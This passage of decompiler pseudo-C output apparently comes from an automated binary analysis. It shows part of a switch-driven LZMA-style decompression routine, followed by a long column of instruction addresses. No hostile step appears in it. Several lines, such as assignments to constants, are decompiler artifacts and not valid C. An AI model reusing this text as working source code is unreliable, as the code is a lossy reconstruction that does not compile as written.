                                                                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											_t366 = __ebp - 0x70;
                                                                                                                                                                                                                            											 *_t366 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                                            											__eflags =  *_t366;
                                                                                                                                                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											goto L112;
                                                                                                                                                                                                                            										case 0x11:
                                                                                                                                                                                                                            											L69:
                                                                                                                                                                                                                            											__esi =  *(__ebp - 0x58);
                                                                                                                                                                                                                            											 *(__ebp - 0x84) = 0x12;
                                                                                                                                                                                                                            											L132:
                                                                                                                                                                                                                            											 *(_t612 - 0x54) = _t605;
                                                                                                                                                                                                                            											goto L133;
                                                                                                                                                                                                                            										case 0x12:
                                                                                                                                                                                                                            											goto L0;
                                                                                                                                                                                                                            										case 0x13:
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                                            												_t469 = __ebp - 0x58;
                                                                                                                                                                                                                            												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                                                                                                                            												__eflags =  *_t469;
                                                                                                                                                                                                                            												 *(__ebp - 0x30) = 0x10;
                                                                                                                                                                                                                            												 *(__ebp - 0x40) = 8;
                                                                                                                                                                                                                            												goto L144;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x4c);
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                                                                            											 *(__ebp - 0x30) = 8;
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                                                                                                                            											goto L130;
                                                                                                                                                                                                                            										case 0x14:
                                                                                                                                                                                                                            											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x80);
                                                                                                                                                                                                                            											L140:
                                                                                                                                                                                                                            											 *(_t612 - 0x88) = _t533;
                                                                                                                                                                                                                            											goto L1;
                                                                                                                                                                                                                            										case 0x15:
                                                                                                                                                                                                                            											__eax = 0;
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                                                            											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                                                                            											__al = __al & 0x000000fd;
                                                                                                                                                                                                                            											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                                                            											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                                                            											goto L121;
                                                                                                                                                                                                                            										case 0x16:
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x30);
                                                                                                                                                                                                                            											__eflags = __eax - 4;
                                                                                                                                                                                                                            											if(__eax >= 4) {
                                                                                                                                                                                                                            												_push(3);
                                                                                                                                                                                                                            												_pop(__eax);
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 4);
                                                                                                                                                                                                                            											 *(__ebp - 0x40) = 6;
                                                                                                                                                                                                                            											__eax = __eax << 7;
                                                                                                                                                                                                                            											 *(__ebp - 0x7c) = 0x19;
                                                                                                                                                                                                                            											 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                                            											goto L145;
                                                                                                                                                                                                                            										case 0x17:
                                                                                                                                                                                                                            											goto L145;
                                                                                                                                                                                                                            										case 0x18:
                                                                                                                                                                                                                            											L146:
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                                            												 *(__ebp - 0x88) = 0x18;
                                                                                                                                                                                                                            												goto L170;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											_t484 = __ebp - 0x70;
                                                                                                                                                                                                                            											 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                                            											__eflags =  *_t484;
                                                                                                                                                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											L148:
                                                                                                                                                                                                                            											_t487 = __ebp - 0x48;
                                                                                                                                                                                                                            											 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                                                                                                                            											__eflags =  *_t487;
                                                                                                                                                                                                                            											goto L149;
                                                                                                                                                                                                                            										case 0x19:
                                                                                                                                                                                                                            											__eflags = __ebx - 4;
                                                                                                                                                                                                                            											if(__ebx < 4) {
                                                                                                                                                                                                                            												 *(__ebp - 0x2c) = __ebx;
                                                                                                                                                                                                                            												L120:
                                                                                                                                                                                                                            												_t394 = __ebp - 0x2c;
                                                                                                                                                                                                                            												 *_t394 =  *(__ebp - 0x2c) + 1;
                                                                                                                                                                                                                            												__eflags =  *_t394;
                                                                                                                                                                                                                            												L121:
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                                                            												__eflags = __eax;
                                                                                                                                                                                                                            												if(__eax == 0) {
                                                                                                                                                                                                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                                                                                                                            													goto L170;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                                                                                                                            												if(__eax >  *(__ebp - 0x60)) {
                                                                                                                                                                                                                            													goto L171;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x30);
                                                                                                                                                                                                                            												_t401 = __ebp - 0x60;
                                                                                                                                                                                                                            												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                                                                                                                            												__eflags =  *_t401;
                                                                                                                                                                                                                            												goto L124;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__ecx = __ebx;
                                                                                                                                                                                                                            											__eax = __ebx;
                                                                                                                                                                                                                            											__ecx = __ebx >> 1;
                                                                                                                                                                                                                            											__eax = __ebx & 0x00000001;
                                                                                                                                                                                                                            											__ecx = (__ebx >> 1) - 1;
                                                                                                                                                                                                                            											__al = __al | 0x00000002;
                                                                                                                                                                                                                            											__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                                                                                                                            											__eflags = __ebx - 0xe;
                                                                                                                                                                                                                            											 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                                                            											if(__ebx >= 0xe) {
                                                                                                                                                                                                                            												__ebx = 0;
                                                                                                                                                                                                                            												 *(__ebp - 0x48) = __ecx;
                                                                                                                                                                                                                            												L103:
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x48);
                                                                                                                                                                                                                            												if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                                                                            													__eax = __eax + __ebx;
                                                                                                                                                                                                                            													 *(__ebp - 0x40) = 4;
                                                                                                                                                                                                                            													 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                                                            													__eax =  *(__ebp - 4);
                                                                                                                                                                                                                            													__eax =  *(__ebp - 4) + 0x644;
                                                                                                                                                                                                                            													__eflags = __eax;
                                                                                                                                                                                                                            													L109:
                                                                                                                                                                                                                            													__ebx = 0;
                                                                                                                                                                                                                            													 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                                            													 *(__ebp - 0x50) = 1;
                                                                                                                                                                                                                            													 *(__ebp - 0x44) = 0;
                                                                                                                                                                                                                            													 *(__ebp - 0x48) = 0;
                                                                                                                                                                                                                            													L113:
                                                                                                                                                                                                                            													__eax =  *(__ebp - 0x40);
                                                                                                                                                                                                                            													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                                                                            													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                                                                                                                            														_t392 = __ebp - 0x2c;
                                                                                                                                                                                                                            														 *_t392 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                                                                                                                            														__eflags =  *_t392;
                                                                                                                                                                                                                            														goto L120;
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            													__eax =  *(__ebp - 0x50);
                                                                                                                                                                                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                                            													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                                                                                            													__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                                            													__esi = __edi + __eax;
                                                                                                                                                                                                                            													 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                                            													__ax =  *__esi;
                                                                                                                                                                                                                            													__ecx = __ax & 0x0000ffff;
                                                                                                                                                                                                                            													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                                                                                                                            													__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                                                                                                                            													if( *(__ebp - 0xc) >= __edx) {
                                                                                                                                                                                                                            														__ecx = 0;
                                                                                                                                                                                                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                                                                                                                            														__ecx = 1;
                                                                                                                                                                                                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                                                                                                                            														__ebx = 1;
                                                                                                                                                                                                                            														__ecx =  *(__ebp - 0x48);
                                                                                                                                                                                                                            														__ebx = 1 << __cl;
                                                                                                                                                                                                                            														__ecx = 1 << __cl;
                                                                                                                                                                                                                            														__ebx =  *(__ebp - 0x44);
                                                                                                                                                                                                                            														__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                                                                                                                            														__cx = __ax;
                                                                                                                                                                                                                            														__cx = __ax >> 5;
                                                                                                                                                                                                                            														__eax = __eax - __ecx;
                                                                                                                                                                                                                            														__edi = __edi + 1;
                                                                                                                                                                                                                            														__eflags = __edi;
                                                                                                                                                                                                                            														 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            														 *__esi = __ax;
                                                                                                                                                                                                                            														 *(__ebp - 0x50) = __edi;
                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                            														 *(__ebp - 0x10) = __edx;
                                                                                                                                                                                                                            														0x800 = 0x800 - __ecx;
                                                                                                                                                                                                                            														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                                                                                                                            														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                                                                                            														 *__esi = __dx;
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            														L112:
                                                                                                                                                                                                                            														_t369 = __ebp - 0x48;
                                                                                                                                                                                                                            														 *_t369 =  *(__ebp - 0x48) + 1;
                                                                                                                                                                                                                            														__eflags =  *_t369;
                                                                                                                                                                                                                            														goto L113;
                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                            														goto L110;
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0xc);
                                                                                                                                                                                                                            												__ebx = __ebx + __ebx;
                                                                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                                                                                            												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                                                                                                                            													__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                                                                                            													__ebx = __ebx | 0x00000001;
                                                                                                                                                                                                                            													__eflags = __ebx;
                                                                                                                                                                                                                            													 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            													L102:
                                                                                                                                                                                                                            													_t339 = __ebp - 0x48;
                                                                                                                                                                                                                            													 *_t339 =  *(__ebp - 0x48) - 1;
                                                                                                                                                                                                                            													__eflags =  *_t339;
                                                                                                                                                                                                                            													goto L103;
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													goto L100;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__edx =  *(__ebp - 4);
                                                                                                                                                                                                                            											__eax = __eax - __ebx;
                                                                                                                                                                                                                            											 *(__ebp - 0x40) = __ecx;
                                                                                                                                                                                                                            											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                                                                                                                                                            											goto L109;
                                                                                                                                                                                                                            										case 0x1a:
                                                                                                                                                                                                                            											L56:
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x64);
                                                                                                                                                                                                                            											if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                                                                            												 *(__ebp - 0x88) = 0x1a;
                                                                                                                                                                                                                            												goto L170;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x68);
                                                                                                                                                                                                                            											__al =  *(__ebp - 0x5c);
                                                                                                                                                                                                                            											__edx =  *(__ebp - 8);
                                                                                                                                                                                                                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                                                                                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                                                                            											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                                                                                            											 *( *(__ebp - 0x68)) = __al;
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x14);
                                                                                                                                                                                                                            											 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                                                                                                                            											__eax = __ecx + 1;
                                                                                                                                                                                                                            											__edx = 0;
                                                                                                                                                                                                                            											_t192 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                                                                            											__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                                                                            											__edx = _t192;
                                                                                                                                                                                                                            											goto L80;
                                                                                                                                                                                                                            										case 0x1b:
                                                                                                                                                                                                                            											L76:
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x64);
                                                                                                                                                                                                                            											if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                                                                            												 *(__ebp - 0x88) = 0x1b;
                                                                                                                                                                                                                            												goto L170;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                                                            											__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                                                                            											if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                                                            												__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                                                            												__eflags = __eax;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__edx =  *(__ebp - 8);
                                                                                                                                                                                                                            											__cl =  *(__eax + __edx);
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                                            											 *(__ebp - 0x5c) = __cl;
                                                                                                                                                                                                                            											 *(__eax + __edx) = __cl;
                                                                                                                                                                                                                            											__eax = __eax + 1;
                                                                                                                                                                                                                            											__edx = 0;
                                                                                                                                                                                                                            											_t275 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                                                                            											__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                                                                            											__edx = _t275;
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x68);
                                                                                                                                                                                                                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                                                                                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                                                                            											_t284 = __ebp - 0x64;
                                                                                                                                                                                                                            											 *_t284 =  *(__ebp - 0x64) - 1;
                                                                                                                                                                                                                            											__eflags =  *_t284;
                                                                                                                                                                                                                            											 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                                                                                            											L80:
                                                                                                                                                                                                                            											 *(__ebp - 0x14) = __edx;
                                                                                                                                                                                                                            											goto L81;
                                                                                                                                                                                                                            										case 0x1c:
                                                                                                                                                                                                                            											while(1) {
                                                                                                                                                                                                                            												L124:
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x64);
                                                                                                                                                                                                                            												if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                                                                            													break;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                                                            												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                                                                            												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                                                            													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                                                            													__eflags = __eax;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__edx =  *(__ebp - 8);
                                                                                                                                                                                                                            												__cl =  *(__eax + __edx);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                                            												 *(__ebp - 0x5c) = __cl;
                                                                                                                                                                                                                            												 *(__eax + __edx) = __cl;
                                                                                                                                                                                                                            												__eax = __eax + 1;
                                                                                                                                                                                                                            												__edx = 0;
                                                                                                                                                                                                                            												_t415 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                                                                            												__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                                                                            												__edx = _t415;
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x68);
                                                                                                                                                                                                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                                                                            												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                                                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x30);
                                                                                                                                                                                                                            												 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                                                                                            												 *(__ebp - 0x14) = _t415;
                                                                                                                                                                                                                            												if( *(__ebp - 0x30) > 0) {
                                                                                                                                                                                                                            													continue;
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													L81:
                                                                                                                                                                                                                            													 *(__ebp - 0x88) = 2;
                                                                                                                                                                                                                            													goto L1;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											 *(__ebp - 0x88) = 0x1c;
                                                                                                                                                                                                                            											L170:
                                                                                                                                                                                                                            											_push(0x22);
                                                                                                                                                                                                                            											_pop(_t567);
                                                                                                                                                                                                                            											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
                                                                                                                                                                                                                            											_t535 = 0;
                                                                                                                                                                                                                            											L172:
                                                                                                                                                                                                                            											return _t535;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								L171:
                                                                                                                                                                                                                            								_t535 = _t534 | 0xffffffff;
                                                                                                                                                                                                                            								goto L172;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						__eax =  *(__ebp - 0x50);
                                                                                                                                                                                                                            						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                                            						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                                                                                            						__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                                            						__esi = __edx + __eax;
                                                                                                                                                                                                                            						 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                                            						__ax =  *__esi;
                                                                                                                                                                                                                            						__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                                            						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                                                            						if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            							__cx = __ax;
                                                                                                                                                                                                                            							__cx = __ax >> 5;
                                                                                                                                                                                                                            							__eax = __eax - __ecx;
                                                                                                                                                                                                                            							__edx = __edx + 1;
                                                                                                                                                                                                                            							 *__esi = __ax;
                                                                                                                                                                                                                            							 *(__ebp - 0x50) = __edx;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                                            							0x800 = 0x800 - __edi;
                                                                                                                                                                                                                            							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                                            							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                                                                                            							 *__esi = __cx;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            							goto L148;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							goto L146;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L1;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406c16
                                                                                                                                                                                                                            0x00406c19
                                                                                                                                                                                                                            0x00406c1b
                                                                                                                                                                                                                            0x00406c1c
                                                                                                                                                                                                                            0x00406c1f
                                                                                                                                                                                                                            0x00406c21
                                                                                                                                                                                                                            0x00406c22
                                                                                                                                                                                                                            0x00406c24
                                                                                                                                                                                                                            0x00406c27
                                                                                                                                                                                                                            0x00406c2c
                                                                                                                                                                                                                            0x00406c31
                                                                                                                                                                                                                            0x00406c3a
                                                                                                                                                                                                                            0x00406c4d
                                                                                                                                                                                                                            0x00406c50
                                                                                                                                                                                                                            0x00406c5c
                                                                                                                                                                                                                            0x00406c84
                                                                                                                                                                                                                            0x00406c86
                                                                                                                                                                                                                            0x00406c94
                                                                                                                                                                                                                            0x00406c94
                                                                                                                                                                                                                            0x00406c98
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406c88
                                                                                                                                                                                                                            0x00406c88
                                                                                                                                                                                                                            0x00406c8b
                                                                                                                                                                                                                            0x00406c8c
                                                                                                                                                                                                                            0x00406c8c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406c88
                                                                                                                                                                                                                            0x00406c62
                                                                                                                                                                                                                            0x00406c67
                                                                                                                                                                                                                            0x00406c67
                                                                                                                                                                                                                            0x00406c70
                                                                                                                                                                                                                            0x00406c78
                                                                                                                                                                                                                            0x00406c7b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406c81
                                                                                                                                                                                                                            0x00406c81
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406c81
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406c9e
                                                                                                                                                                                                                            0x00406c9e
                                                                                                                                                                                                                            0x00406ca2
                                                                                                                                                                                                                            0x0040754e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040754e
                                                                                                                                                                                                                            0x00406cab
                                                                                                                                                                                                                            0x00406cbb
                                                                                                                                                                                                                            0x00406cbe
                                                                                                                                                                                                                            0x00406cc1
                                                                                                                                                                                                                            0x00406cc1
                                                                                                                                                                                                                            0x00406cc1
                                                                                                                                                                                                                            0x00406cc4
                                                                                                                                                                                                                            0x00406cc8
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406cca
                                                                                                                                                                                                                            0x00406cd0
                                                                                                                                                                                                                            0x00406cfa
                                                                                                                                                                                                                            0x00406d00
                                                                                                                                                                                                                            0x00406d07
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406d07
                                                                                                                                                                                                                            0x00406cd6
                                                                                                                                                                                                                            0x00406cd9
                                                                                                                                                                                                                            0x00406cde
                                                                                                                                                                                                                            0x00406cde
                                                                                                                                                                                                                            0x00406ce9
                                                                                                                                                                                                                            0x00406cf1
                                                                                                                                                                                                                            0x00406cf4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406d39
                                                                                                                                                                                                                            0x00406d3f
                                                                                                                                                                                                                            0x00406d42
                                                                                                                                                                                                                            0x00406d4f
                                                                                                                                                                                                                            0x00406d57
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406d0e
                                                                                                                                                                                                                            0x00406d0e
                                                                                                                                                                                                                            0x00406d12
                                                                                                                                                                                                                            0x0040755d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040755d
                                                                                                                                                                                                                            0x00406d1e
                                                                                                                                                                                                                            0x00406d29
                                                                                                                                                                                                                            0x00406d29
                                                                                                                                                                                                                            0x00406d29
                                                                                                                                                                                                                            0x00406d2c
                                                                                                                                                                                                                            0x00406d2f
                                                                                                                                                                                                                            0x00406d32
                                                                                                                                                                                                                            0x00406d37
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004073ce
                                                                                                                                                                                                                            0x004073ce
                                                                                                                                                                                                                            0x004073d4
                                                                                                                                                                                                                            0x004073da
                                                                                                                                                                                                                            0x004073e0
                                                                                                                                                                                                                            0x004073fa
                                                                                                                                                                                                                            0x004073fd
                                                                                                                                                                                                                            0x00407403
                                                                                                                                                                                                                            0x0040740e
                                                                                                                                                                                                                            0x0040740e
                                                                                                                                                                                                                            0x00407410
                                                                                                                                                                                                                            0x004073e2
                                                                                                                                                                                                                            0x004073e2
                                                                                                                                                                                                                            0x004073f1
                                                                                                                                                                                                                            0x004073f5
                                                                                                                                                                                                                            0x004073f5
                                                                                                                                                                                                                            0x0040741a
                                                                                                                                                                                                                            0x00407160
                                                                                                                                                                                                                            0x00407163
                                                                                                                                                                                                                            0x00407166
                                                                                                                                                                                                                            0x00407166
                                                                                                                                                                                                                            0x00407169
                                                                                                                                                                                                                            0x00407170
                                                                                                                                                                                                                            0x00407175
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407203
                                                                                                                                                                                                                            0x00407203
                                                                                                                                                                                                                            0x00407207
                                                                                                                                                                                                                            0x004075a5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004075a5
                                                                                                                                                                                                                            0x0040720d
                                                                                                                                                                                                                            0x00407210
                                                                                                                                                                                                                            0x00407213
                                                                                                                                                                                                                            0x00407217
                                                                                                                                                                                                                            0x0040721a
                                                                                                                                                                                                                            0x00407220
                                                                                                                                                                                                                            0x00407222
                                                                                                                                                                                                                            0x00407222
                                                                                                                                                                                                                            0x00407222
                                                                                                                                                                                                                            0x00407225
                                                                                                                                                                                                                            0x00407228
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406df8
                                                                                                                                                                                                                            0x00406df8
                                                                                                                                                                                                                            0x00406dfc
                                                                                                                                                                                                                            0x00407569
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407569
                                                                                                                                                                                                                            0x00406e02
                                                                                                                                                                                                                            0x00406e05
                                                                                                                                                                                                                            0x00406e08
                                                                                                                                                                                                                            0x00406e0c
                                                                                                                                                                                                                            0x00406e0f
                                                                                                                                                                                                                            0x00406e15
                                                                                                                                                                                                                            0x00406e17
                                                                                                                                                                                                                            0x00406e17
                                                                                                                                                                                                                            0x00406e17
                                                                                                                                                                                                                            0x00406e1a
                                                                                                                                                                                                                            0x00406e1d
                                                                                                                                                                                                                            0x00406e1d
                                                                                                                                                                                                                            0x00406e20
                                                                                                                                                                                                                            0x00406e23
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
